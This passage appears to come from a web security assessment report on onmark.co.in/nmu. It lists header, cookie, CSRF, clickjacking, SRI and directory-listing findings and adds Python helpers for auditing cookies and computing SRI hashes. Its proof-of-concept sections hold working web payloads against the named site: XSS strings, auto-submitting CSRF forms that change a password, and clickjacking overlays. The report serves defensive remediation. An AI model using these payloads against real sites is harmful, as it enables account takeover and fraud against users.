When clicked, victims believe they’re interacting with visible interface elements while triggering unintended actions like transferring funds or changing settings.\n\nHTML example:\n```html\n<style>\niframe { position:absolute; top:0; left:0; opacity:0; z-index:999; }\nbutton { position:relative; z-index:1000; }\n</style>\n\n<button onclick=\"alert('Clicked!')\">Click Me</button>\n<iframe src=\"https://onmark.co.in/nmu/\"></iframe>\n```\n\n**Business Impact**  \nLeads to unauthorized transactions, social engineering exploits, and reputational harm stemming from compromised user trust. Particularly impactful for financial services or administrative portals handling sensitive operations.\n\n---\n\n### [Content Security Policy (CSP) Header Not Set / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nAbsence of a Content Security Policy (CSP) leaves the application open to various client-side injection flaws, particularly reflected/stored XSS. CSP acts as a defense-in-depth mechanism by restricting sources from which scripts, stylesheets, and media can be loaded.\n\n**Attack Scenario (Proof of Concept)**  \nA reflected XSS exists in a parameterized query string. Without CSP, injected scripts execute freely in the victim’s browser:\n\nURL:\n```\nhttps://onmark.co.in/nmu/?search=<script>alert(1)</script>\n```\n\nResultant DOM:\n```html\n<p>You searched for: <script>alert(1)</script></p>\n```\n\nExecutes immediately in browser.\n\n**Business Impact**  \nIncreases likelihood of successful XSS exploitation, enabling session hijacking, keylogging, redirection to malicious sites, and manipulation of displayed content. 
Critical for protecting both user privacy and organizational reputation.\n\n---\n\n### [Absence of Anti-CSRF Tokens / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nForms lacking anti-CSRF tokens are susceptible to Cross-Site Request Forgery (CSRF), wherein authenticated users unknowingly submit requests crafted by attackers. This bypasses same-origin policy limitations through forged submissions initiated externally.\n\n**Attack Scenario (Proof of Concept)**  \nVictim visits attacker-controlled webpage containing auto-submitting form targeting the vulnerable endpoint:\n\n```html\n<form method=\"POST\" action=\"https://onmark.co.in/nmu/change-password\">\n  <input type=\"hidden\" name=\"new_password\" value=\"attacker123\">\n</form>\n<script>document.forms[0].submit();</script>\n```\n\nUpon loading, victim unknowingly changes password to attacker-controlled value.\n\n**Business Impact**  \nAllows unauthorized modification of user accounts, privilege escalation, or execution of destructive actions under valid authentication contexts. Especially dangerous in high-privilege areas like admin panels or payment systems.\n\n---\n\n### [Sub Resource Integrity Attribute Missing / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nExternal JavaScript/CSS resources included without Subresource Integrity (SRI) attributes lack cryptographic verification. 
Should the CDN or external host become compromised, attackers gain full control over frontend logic and presentation layers.\n\n**Attack Scenario (Proof of Concept)**  \nAssume jQuery is loaded from a public CDN without SRI:\n```html\n<script src=\"https://code.jquery.com/jquery-3.6.0.min.js\"></script>\n```\n\nIf CDN gets hijacked or cache poisoned, attacker injects malicious script replacing original functionality, stealing credentials or manipulating DOM behavior silently.\n\n**Business Impact**  \nCompromises front-end integrity, opening pathways for supply chain-based attacks. Users remain unaware of altered scripts running in their browsers, undermining trust and exposing them to persistent surveillance or fraud.\n\n---\n\n### [Vulnerable JS Library (bootstrap.min.js) / https://onmark.co.in/nmu/assets/js/bootstrap.min.js / bootstrap.min.js]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js/bootstrap.min.js |\n\n**Description**  \nUse of outdated or vulnerable JavaScript libraries introduces known weaknesses exploitable remotely. Bootstrap, widely adopted across websites, has historically suffered from XSS, prototype pollution, and event handler injection issues depending on version deployed.\n\n**Attack Scenario (Proof of Concept)**  \nUsing scanner output or manual inspection, attacker identifies Bootstrap v3.3.7 being used. Consulting CVE databases reveals CVE-2018-14040 affecting tooltip/popover sanitization functions. Crafting specially designed markup leads to XSS:\n\nPayload:\n```html\n<div data-toggle=\"tooltip\" title=\"<img src=x onerror=alert(1)>\">Hover me</div>\n```\n\nTriggers XSS when tooltip activated.\n\n**Business Impact**  \nExposes users to XSS risks originating from third-party dependencies. 
Even minor flaws in popular frameworks can escalate into major breaches once chained with other vulnerabilities.\n\n---\n\n### [Vulnerable JS Library (jquery.min.js) / https://onmark.co.in/nmu/assets/js/jquery.min.js / jquery.min.js]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js/jquery.min.js |\n\n**Description**  \njQuery remains one of the most prevalent client-side libraries globally. Older versions have documented XSS vectors, especially around selector parsing and DOM manipulation routines. Failure to update increases exposure to well-known exploits.\n\n**Attack Scenario (Proof of Concept)**  \nIdentify jQuery version 1.11.1 in use. Known vulnerability CVE-2015-9251 affects `.load()` function when passed unsanitized user input. Exploitation proceeds via crafted selectors:\n\nInput:\n```javascript\n$('#container').load('evil.html #<img src=x onerror=alert(1)>');\n```\n\nResults in inline script execution.\n\n**Business Impact**  \nLegacy jQuery usage undermines overall application resilience. Given widespread adoption, attackers frequently scan for outdated instances to launch automated XSS campaigns.\n\n---\n\n### [Missing Anti-clickjacking Header / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser-facing pages lacking clickjacking defenses pose elevated risk compared to general-purpose endpoints. Authentication flows, profile edits, and personal dashboards benefit significantly from robust framing restrictions to prevent impersonation or forced actions.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker constructs a deceptive overlay mimicking login prompts atop actual `/user` dashboard. 
Victim believes they're entering credentials again but instead submits form to attacker-controlled endpoint capturing session tokens.\n\nOverlay HTML:\n```html\n<div style=\"position:absolute;top:100px;left:200px;z-index:999;\">\n  Enter your password again:<br/>\n  <input type=\"password\" id=\"fakepass\"><br/>\n  <button onclick=\"steal()\">Submit</button>\n</div>\n<iframe src=\"https://onmark.co.in/nmu/user\" style=\"opacity:0;\"></iframe>\n```\n\n**Business Impact**  \nHeightened susceptibility to credential harvesting, session fixation, and unauthorized modifications. User-centric interfaces demand stricter protections due to higher-value targets and frequent interaction patterns.\n\n---\n\n### [Content Security Policy (CSP) Header Not Set / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser-specific routes often handle dynamic content rendering and personalized views. Omission of CSP here amplifies risks associated with XSS, especially in interactive features involving rich text inputs or collaborative editing capabilities.\n\n**Attack Scenario (Proof of Concept)**  \nProfile update form accepts HTML-like input without escaping. Injected script executes because no CSP blocks inline execution:\n\nInput:\n```html\n<img src=x onerror=\"fetch('/api/profile', {method:'POST', body:JSON.stringify({bio:'hacked'})})\">\n```\n\nUpdates bio field automatically upon rendering.\n\n**Business Impact**  \nElevated chance of persistent XSS impacting individual users’ experiences and potentially escalating to broader system compromise. 
Personalized sections require enhanced safeguards due to variable trust levels and diverse input handling.\n\n---\n\n### [Absence of Anti-CSRF Tokens / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser management functions—including profile updates, preferences changes, and notification settings—are prime candidates for CSRF exploitation. Lack of token validation permits attackers to manipulate these aspects surreptitiously.\n\n**Attack Scenario (Proof of Concept)**  \nVictim receives email linking to attacker-hosted page containing hidden form altering notification preferences:\n\n```html\n<form method=\"POST\" action=\"https://onmark.co.in/nmu/user/settings\">\n  <input type=\"hidden\" name=\"notifications_enabled\" value=\"false\">\n</form>\n<script>document.forms[0].submit();</script>\n```\n\nDisables notifications without consent.\n\n**Business Impact**  \nDiminished user experience, reduced engagement metrics, and potential compliance violations. Disabling alerts can mask subsequent compromises, delaying incident detection and response times.\n\n---\n\n### [Sub Resource Integrity Attribute Missing / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser-facing pages commonly integrate numerous third-party scripts for analytics, advertising, or UI enhancements. 
Missing SRI attributes mean the browser trusts whatever bytes the third-party host returns, making each dependency a potential vector for compromise.\n\n**Attack Scenario (Proof of Concept)**  \nInclude Google Analytics without SRI:\n```html\n<script async src=\"https://www.googletagmanager.com/gtag/js?id=G-XXXXXXXXXX\"></script>\n```\n\nShould the GA host, or the path by which the browser reaches it, be compromised, the malicious payload runs with the page's full origin privileges for every visitor.\n\nCaveat for remediation: SRI only fits resources whose bytes are fixed. `gtag.js` is updated by Google without notice, so pinning its hash would break analytics on the next release. For scripts like that, the practical controls are to self-host a reviewed copy, to constrain what third-party script may do with CSP (`script-src` allow-list, `connect-src`), and to reserve `integrity` attributes for versioned library files served from a CDN.\n\n**Business Impact**  \nSupply chain threats extend beyond the immediate codebase. Compromised external scripts can harvest user activity, inject ads, or redirect traffic, eroding brand credibility and violating privacy expectations.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/css/ / /assets/css/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css/ |\n\n**Description**  \nPublicly accessible directory listings in static asset folders expose filenames and folder structure, and sometimes files that were never meant to be linked. Such disclosures help attackers map application layout and spot outdated or debug builds.\n\n**Attack Scenario (Proof of Concept)**  \nNavigate to `https://onmark.co.in/nmu/assets/css/` and observe:\n```\nadmin.css\ndebug.css\ntheme.css\n```\n\nDownload `debug.css` to inspect commented-out API keys or internal routing hints.\n\n**Business Impact**  \nLeaks architectural decisions, development artifacts, and possibly hardcoded secrets. 
Facilitates deeper reconnaissance and lowers barriers to lateral movement within the application ecosystem.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/ / /assets/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/ |\n\n**Description**  \nRoot-level asset directories should never permit browsing. Exposing top-tier structure reveals subdirectories like `/images`, `/js`, and `/fonts`, guiding attackers toward valuable targets for enumeration and exploitation.\n\n**Attack Scenario (Proof of Concept)**  \nAccessing `https://onmark.co.in/nmu/assets/` yields:\n```\ncss/\nimages/\njs/\nfonts/\n```\n\nEach becomes focus point for recursive scanning and deeper probing.\n\n**Business Impact**  \nBroadens reconnaissance scope unnecessarily, encouraging focused attacks against known resource locations. Increases chances of discovering misconfigured permissions or leftover test files.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/images/ / /assets/images/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/images/ |\n\n**Description**  \nImage repositories often house branding materials, screenshots, diagrams, or internal visuals. Public indexing grants visibility into visual assets, sometimes disclosing confidential imagery or staging/testing content.\n\n**Attack Scenario (Proof of Concept)**  \nListing shows:\n```\ninternal_diagram.png\ntest_logo.svg\nprod_banner.jpg\n```\n\nDownloading `internal_diagram.png` reveals backend topology or undocumented workflows.\n\n**Business Impact**  \nUnintended disclosure of proprietary visuals, internal processes, or unreleased products. 
May violate NDAs or breach marketing embargo periods.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/js/ / /assets/js/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js/ |\n\n**Description**  \nJavaScript directories frequently store compiled bundles, vendor libraries, and custom modules. Allowing unrestricted listing exposes filenames, build timestamps, and potentially minified source maps aiding reverse-engineering efforts.\n\n**Attack Scenario (Proof of Concept)**  \nDirectory lists:\n```\napp.bundle.js\nvendor.chunk.js\nmain.js.map\n```\n\nRetrieving `.map` file reconstructs readable source code for analysis.\n\n**Business Impact**  \nFacilitates intellectual property theft, competitor intelligence gathering, and identification of implementation flaws. Source maps especially undermine obfuscation efforts meant to protect business logic.\n\n---\n\n### [Cookie No HttpOnly Flag / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nCookies lacking the `HttpOnly` flag remain accessible to client-side scripts, increasing exposure to XSS-driven session hijacking. Though less critical than missing secure flags, this omission widens attack surface unnecessarily.\n\n**Attack Scenario (Proof of Concept)**  \nXSS vulnerability allows reading document.cookie:\n```javascript\nconsole.log(document.cookie); // Outputs: sessionid=abc123xyz;\n```\n\nSession ID extracted and reused elsewhere.\n\n**Business Impact**  \nMinor elevation in XSS impact severity. 
While not exploitable on its own, it compounds the effect of any XSS flaw and falls short of accepted session management practice.\n\n---\n\n### [Cookie without SameSite Attribute / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe application sets cookies without specifying the `SameSite` attribute. This attribute restricts when a cookie is attached to cross-site requests, mitigating Cross-Site Request Forgery (CSRF), Cross-Site Script Inclusion (XSSI), and some timing side channels. What happens when it is absent depends on the browser: Chromium-based browsers (Chrome, Edge) treat a cookie without `SameSite` as `Lax`, with a two-minute window after the cookie is set during which it is still sent on top-level cross-site POSTs; browsers that do not apply Lax by default send the cookie on every cross-site request, as if `SameSite=None` had been set. Relying on the browser default therefore gives no guaranteed protection; set an explicit `SameSite=Lax` (or `Strict` for the session cookie where the login flows allow it) alongside server-side CSRF tokens.\n\nAn attacker could exploit this behavior by crafting malicious websites that trigger authenticated actions on behalf of a logged-in user without their knowledge or consent.\n\n**Attack Scenario (Proof of Concept)**\n\n1. A victim logs into `https://onmark.co.in/nmu/`.\n2. An attacker hosts a malicious site (`https://evil.com`) containing:\n   ```html\n   <img src=\"https://onmark.co.in/nmu/delete-account\" style=\"display:none;\" />\n   ```\n3. When the victim visits `https://evil.com`, the browser sends the session cookie along with the request to `/delete-account` if it treats the missing attribute as `None`. Under Chromium's Lax default the `<img>` subresource request goes out without the cookie; there the attacker needs a top-level navigation (a link or `window.location` redirect to the same URL) for a GET endpoint, or a form POST inside the two-minute window.\n4. If the endpoint does not have additional CSRF protections, the action may execute successfully.\n\nThis demonstrates potential unauthorized actions performed under the victim's authenticated context; a state-changing endpoint reachable by GET makes it worse, since `Lax` deliberately allows top-level GET navigations.\n\n**Business Impact**\n\nWhile low severity individually, lack of `SameSite` protection increases exposure when combined with other vulnerabilities. It contributes to CSRF risk, which can lead to unauthorized transactions, account takeovers, or reputational harm if exploited at scale. 
Regulatory frameworks like GDPR or PCI DSS may also penalize insufficient anti-CSRF controls.\n\n---\n\n### [Cookie Without Secure Flag / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nCookies were set without the `Secure` flag. This directive tells the browser to send the cookie only over encrypted HTTPS connections; without it the browser also attaches the cookie to any plaintext `http://` request to the host, and an attacker positioned on the network path (public Wi-Fi, a compromised router) can read it.\n\nEven when the site redirects every HTTP request to HTTPS, that first plaintext request already carries the cookie, so a global redirect does not substitute for the flag. The `Secure` flag and HSTS (reported separately) are complementary: HSTS stops the browser from making the plaintext request at all, `Secure` stops the cookie from riding on one if it happens.\n\n**Attack Scenario (Proof of Concept)**\n\n1. Victim accesses `http://onmark.co.in/nmu/` (e.g., via a typo or cached redirect).\n2. The browser attaches the existing session cookie, which lacks the `Secure` flag, to that plaintext request.\n3. Attacker performs passive eavesdropping on the HTTP connection.\n4. Session ID is captured and reused by the attacker to impersonate the victim.\n\nAlternatively, an active MITM attacker can inject a plaintext reference to the site into any unrelated HTTP page the victim loads, forcing the browser to make the leaking request.\n\n**Business Impact**\n\nExposure of session identifiers compromises user accounts, leading to unauthorized access, data theft, or fraudulent activity. 
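The three cookie findings above (HttpOnly, SameSite, Secure) come down to which attributes a `Set-Cookie` header carries and what each browser does when `SameSite` is absent. The following Python is an added example written for this report, not the scanner's or the application's code: it parses a `Set-Cookie` value, lists the attribute findings, and models whether the cookie would accompany a cross-site request under the Chromium Lax-by-default rule versus a browser that treats the missing attribute as `None`. The header values are constructed; the two-minute Lax+POST window and the rejection of `SameSite=None` without `Secure` are Chromium's documented behaviour, encoded here as assumptions.

```python
"""Audit Set-Cookie attributes and model cross-site cookie delivery.

Added example for this report (not scanner or application code).
Browser rules encoded here, as assumptions stated in the lead-in:
  - 'chromium': a cookie without SameSite behaves as Lax, except that for
    two minutes after it is set it is still sent on top-level cross-site
    POSTs ("Lax+POST"); SameSite=None is only accepted together with Secure.
  - 'none_default': a browser that sends a SameSite-less cookie on every
    cross-site request, i.e. treats the missing attribute as None.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class Cookie:
    name: str
    value: str
    secure: bool = False
    httponly: bool = False
    samesite: Optional[str] = None          # None when the attribute is absent
    attrs: Dict[str, str] = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value into its name/value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
        elif key == "samesite":
            cookie.samesite = val.strip().lower() or None
        elif key:
            cookie.attrs[key] = val.strip()
    return cookie


def audit(cookie: Cookie) -> List[str]:
    """Return the attribute findings this report raises for a cookie."""
    findings = []
    if not cookie.httponly:
        findings.append("no HttpOnly: readable through document.cookie after XSS")
    if not cookie.secure:
        findings.append("no Secure: attached to plaintext http:// requests")
    if cookie.samesite is None:
        findings.append("no SameSite: cross-site behaviour left to the browser default")
    elif cookie.samesite == "none" and not cookie.secure:
        findings.append("SameSite=None without Secure: rejected by Chromium")
    return findings


def sent_cross_site(cookie: Cookie, request: str, browser: str,
                    set_seconds_ago: int = 600) -> bool:
    """Would the cookie accompany a cross-site request of this kind?

    request: 'top_get'     top-level navigation with a safe method
             'top_post'    top-level form POST
             'subresource' img/script/fetch/XHR issued by the attacker's page
    browser: 'chromium' or 'none_default' (see module docstring)
    """
    mode = cookie.samesite
    if mode is None:
        if browser == "chromium":
            if request == "top_post" and set_seconds_ago < 120:
                return True                 # Lax+POST grace window
            mode = "lax"
        else:
            mode = "none"
    if mode == "none":
        # Chromium never stored a None cookie that lacks Secure.
        return cookie.secure or browser != "chromium"
    if mode == "lax":
        return request == "top_get"
    return False                            # strict


# Constructed header shaped like the session cookie in this report.
SAMPLE = "sessionid=abc123xyz; Path=/"

if __name__ == "__main__":
    c = parse_set_cookie(SAMPLE)
    for line in audit(c):
        print(line)
    print("img PoC carries the cookie in Chromium:",
          sent_cross_site(c, "subresource", "chromium"))
```

Run against the `<img>` PoC from the SameSite finding: `sent_cross_site(cookie, "subresource", "chromium")` is False while the same call with `"none_default"` is True, which is why that PoC needs a top-level navigation to work in Chrome, and why the attribute should be set explicitly rather than left to whichever browser the victim uses.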
Organizations face compliance violations under standards requiring encryption of sensitive data in transit, including HIPAA, PCI-DSS, and ISO/IEC 27001.\n\n---\n\n### [Cross-Domain JavaScript Source File Inclusion / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe web page loads external JavaScript resources from third-party domains. While common practice for CDN-hosted libraries (like jQuery or Bootstrap), this introduces supply chain risks. If the third-party host becomes compromised or serves malicious code, it affects all pages referencing those scripts.\n\nThe origin a script is fetched from does not limit what it may do: a script pulled in by `<script src>` runs with the full privileges of the including page's origin (its DOM, cookies readable from script, and same-origin API calls), so the third party's security posture becomes part of the application's.\n\n**Attack Scenario (Proof of Concept)**\n\n1. Application includes `<script src=\"https://cdn.example.com/library.js\"></script>`.\n2. Attacker compromises `cdn.example.com` and replaces `library.js` with malicious payload.\n3. All users visiting `https://onmark.co.in/nmu/` now load the tampered script.\n4. Malicious script steals cookies, performs keylogging, or redirects users to phishing sites.\n\nEven short of a full compromise, the absence of subresource integrity (SRI) means a silently modified file is indistinguishable from a legitimate update, which makes detection difficult.\n\n**Business Impact**\n\nThird-party script hijacking leads to widespread client-side compromise, resulting in credential theft, financial fraud, or brand reputation damage. 
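Both the SRI finding on `/nmu/user` and the cross-domain script inclusion finding above have the same fix for versioned third-party files: compute the hash of the exact bytes you deploy, put it in the `integrity` attribute, and let the browser refuse anything else. The Python below is an added example for this report, not the application's or any CDN's code; it computes an SRI token, emits the tag, and applies the browser's verification rule (strongest listed algorithm wins). The library body is a constructed stand-in, and `https://cdn.example.com/library.js` is the placeholder URL already used in the scenario above.

```python
"""Subresource Integrity: compute, emit and verify integrity tokens.

Added example for this report (not the application's or any CDN's code).
The script body below is a constructed stand-in for a vendored library;
in practice hash the exact bytes you deploy from a versioned URL.
"""
import base64
import hashlib

# Algorithms SRI permits, ordered by the strength the browser prefers.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_digest(body: bytes, algo: str = "sha384") -> str:
    """Return an integrity token such as 'sha384-<base64 digest>'."""
    if algo not in STRENGTH:
        raise ValueError("SRI permits sha256, sha384 or sha512 only")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Emit the <script> tag with integrity and crossorigin set
    (crossorigin is required for the browser to check a cross-origin file)."""
    return (f'<script src="{src}" integrity="{sri_digest(body)}" '
            f'crossorigin="anonymous"></script>')


def verify(body: bytes, integrity: str) -> bool:
    """Apply the browser's check: among the recognised tokens keep those
    using the strongest algorithm, and accept the body if any of them matches."""
    tokens = []
    for token in integrity.split():
        algo, _, digest_b64 = token.partition("-")
        algo = algo.lower()
        if algo in STRENGTH:
            tokens.append((algo, digest_b64))
    if not tokens:
        return True  # no usable metadata: browsers load the resource unchecked
    best = max(STRENGTH[algo] for algo, _ in tokens)
    return any(sri_digest(body, algo).partition("-")[2] == digest_b64
               for algo, digest_b64 in tokens if STRENGTH[algo] == best)


# Constructed library body standing in for a pinned third-party file.
LIBRARY = b"(function(){window.vendorLib={version:'1.2.3'};})();\n"

if __name__ == "__main__":
    print(script_tag("https://cdn.example.com/library.js", LIBRARY))
    print("tampered copy accepted:",
          verify(LIBRARY + b"//x", sri_digest(LIBRARY)))
```

The `verify` function mirrors why a bare `integrity` attribute with an unrecognised algorithm gives no protection: the browser ignores it and loads the file, so a typo in the token is a silent failure, not a block.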
Enterprises relying heavily on CDNs must ensure strict integrity checks and monitor vendor trustworthiness continuously.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nHTTP Strict Transport Security (HSTS) instructs browsers to communicate with the host exclusively over HTTPS for a defined period (`max-age`, in seconds), rewriting any `http://` URL for it to `https://` before a request is made. Without it, an attacker on the network path can perform SSL stripping: answer the user's first plaintext request with a plaintext copy of the site and never let the upgrade to HTTPS happen.\n\nThe header is only honoured when received over HTTPS, so it protects every visit after the first successful one until `max-age` expires; the very first visit (and visits after clearing browser state) is covered only if the domain is on the browsers' preload list.\n\n**Attack Scenario (Proof of Concept)**\n\n1. User types `onmark.co.in/nmu/` in address bar.\n2. Browser issues a plaintext HTTP request first and relies on the server's redirect to reach HTTPS.\n3. Active MITM intercepts the redirect and keeps the victim on HTTP, proxying content from the real HTTPS site.\n4. Sensitive information (cookies, form data) is exposed in cleartext.\n\nWith HSTS in effect, step 2 never happens: the browser upgrades the URL internally. A typical value is `Strict-Transport-Security: max-age=31536000; includeSubDomains`, sent on every HTTPS response; `preload` can be added once the site is ready to be submitted to the preload list.\n\n**Business Impact**\n\nLack of HSTS undermines TLS deployment efforts, exposing organizations to persistent downgrade threats. 
Compliance regimes such as NIST SP 800-52r2 mandate HSTS usage for federal systems, making non-compliance a regulatory concern.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe `X-Content-Type-Options: nosniff` header tells the browser to honour the declared `Content-Type` rather than guessing the type from the bytes. Its omission matters most where user-uploaded content or loosely typed static files are served: in current browsers the header's main effect is to make `<script>` and `<style>` loads fail when the response does not carry a JavaScript or CSS MIME type, and in legacy clients (older Internet Explorer in particular) it also prevents a text response from being sniffed and rendered as HTML.\n\n**Attack Scenario (Proof of Concept)**\n\n1. Attacker uploads a file containing JavaScript to an endpoint that stores it and serves it back.\n2. Server returns the file with `Content-Type: text/plain`.\n3. A page on the hosting origin that the attacker can influence (for instance through an HTML injection point) references the upload with `<script src=\"...\">`; without `nosniff` the browser executes it despite the declared type, whereas with `nosniff` the load is refused.\n4. Arbitrary client-side code runs in the context of the hosting domain.\n\nSuch scenarios often arise from misconfigured upload endpoints or improperly served static files; the header is cheap insurance for the case where a content-type mistake slips through.\n\n**Business Impact**\n\nMIME-sniffing bypasses content-type restrictions, increasing XSS exploitation likelihood. 
Successful attacks can result in session hijacking, defacement, or phishing campaigns originating from trusted domains, damaging credibility and violating security policies.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://onmark.co.in/nmu/assets/css/bootstrap.css / https://onmark.co.in/nmu/assets/css/bootstrap.css]\n\n| Field | Value |\n|---|---|\n| Severity | LO W |\n| CVSS Score | 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css/bootstrap.css |\n\n**Description**\n\nThe HTTP Strict Transport Security (HSTS) header enforces secure communication by instructing browsers to only connect via HTTPS for a defined period. Its absence means that even if the site supports HTTPS, users might still be vulnerable to man-in-the-middle attacks such as SSL stripping, where an attacker downgrades the connection from HTTPS to HTTP without the user's knowledge.\n\nThis instance is the same weakness observed on a static asset: the CSS file is served over HTTPS without the `Strict-Transport-Security` header. Browsers record HSTS per host from any HTTPS response that carries the header, so this is not a separate fix; once the server sends the header on all HTTPS responses, this and the finding on `/nmu/` are resolved together. The scanner reports each response that lacks it because, until that happens, no response is setting the policy.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker positioned between the victim and the server can intercept initial plaintext HTTP requests or manipulate responses to downgrade future connections:\n\n1. Victim attempts to load `http://onmark.co.in/nmu/assets/css/bootstrap.css` (for example because a page was reached over plaintext HTTP and references the asset by a scheme-relative URL).\n2. Attacker intercepts the request and responds with a spoofed version of the resource over HTTP.\n3. Browser loads the insecure asset; attacker-controlled CSS can restyle the page, overlay fake form fields, or exfiltrate field values through attribute selectors.\n4. Even when navigating to HTTPS sections later, there’s no enforced protection against downgrade due to missing HSTS headers.\n\nExample request:\n```http\nGET /nmu/assets/css/bootstrap.css HTTP/1.1\nHost: onmark.co.in\n```\n\nNo 